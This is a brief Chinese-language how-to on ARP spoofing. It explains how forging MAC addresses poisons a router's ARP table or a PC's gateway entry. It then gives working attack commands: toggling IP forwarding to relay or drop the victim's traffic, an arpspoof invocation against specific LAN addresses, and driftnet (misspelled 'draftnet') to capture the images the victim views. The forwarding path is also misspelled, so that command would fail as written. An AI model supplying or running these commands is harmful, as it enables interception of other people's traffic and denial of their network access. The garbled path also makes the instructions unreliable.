ARP欺騙: 由於局域網的網絡流通不是根據IP地址進行,而是根據MAC地址進行傳輸。所以,MAC地址在A上被僞造成一個不存在的MAC地址,這樣就會導致網絡不通,A不能Ping通!這就是一個簡單的ARP欺騙。
ARP欺騙是***常用的***手段之一,ARP欺騙分爲二種,一種是對路由器ARP表的欺騙;另一種是對內網PC的網關欺騙。
欺騙代碼:echo 1 > /proc/sys/net/ipv4/ip_forword --1是指替被欺騙的pc像網關發送數據改爲0則是不發送數據,被騙的pc就無法正常上網。
draftnet是指監聽被騙pc所瀏覽的圖片。
arpspoof -i eth0 -t 172.28.15.254 172.28.15.34 欺騙網關,前一個爲網關,後一個爲被騙ip地址。